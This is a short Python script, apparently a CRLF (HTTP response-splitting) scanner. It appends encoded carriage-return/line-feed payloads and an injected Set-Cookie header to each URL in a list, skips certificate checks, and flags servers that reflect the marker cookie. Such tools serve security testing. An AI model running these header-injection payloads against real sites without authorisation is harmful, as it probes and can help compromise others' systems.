#!/bin/python3
import sys
import json
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if len(sys.argv) < 2:
	print("crlf_injector <urlfile>")
	exit()

urlfile = open(sys.argv[1], 'r')
urls = urlfile.readlines()

def inject(url, crlf):
	url += crlf + "Set-Cookie:ABCDEF=GHIJKL%3b"
	
	#print("URL:%s" % url)
	try:
		response = requests.get(url, verify=False)
		if "ABCDEF=GHIJKL" in json.dumps(dict(response.headers)):
		#if "keep-alive" in json.dumps(dict(response.headers)):
			print("URL:%s" % url)
			print("BINGO:%s <===================" %response.headers)
	except Exception as e:
		print("Error: %s" % str(e))
		pass

for url in urls:
	url = url.strip()
	if not url.endswith("/"):
		url += "/"

	#schema = url.split("://")[0]
	
	#parts = url.split("://")[1].split("/")
	#authority = parts[0]
	#port = ''
	#if ":" in authority:
	#	port = authority.split(":")[1]
	#else:
	#	port = (schema == "http" ? 80 : 443)

	#path = ''
	#query = ''
	#if len(parts) > 1:
	#	path = parts[1].split('?')[0]
	#	if "?" in parts[1]:
	#		query = parts[1].split('?')[1]


	inject(url, "%0d%0a")
	inject(url+"?", "%0d%0a")
	inject(url+"?a=", "%0d%0a")

	inject(url, "%E5%98%8D%E5%98%8A")
	inject(url+"?", "%E5%98%8D%E5%98%8A")
	inject(url+"?a=", "%E5%98%8D%E5%98%8A")
	
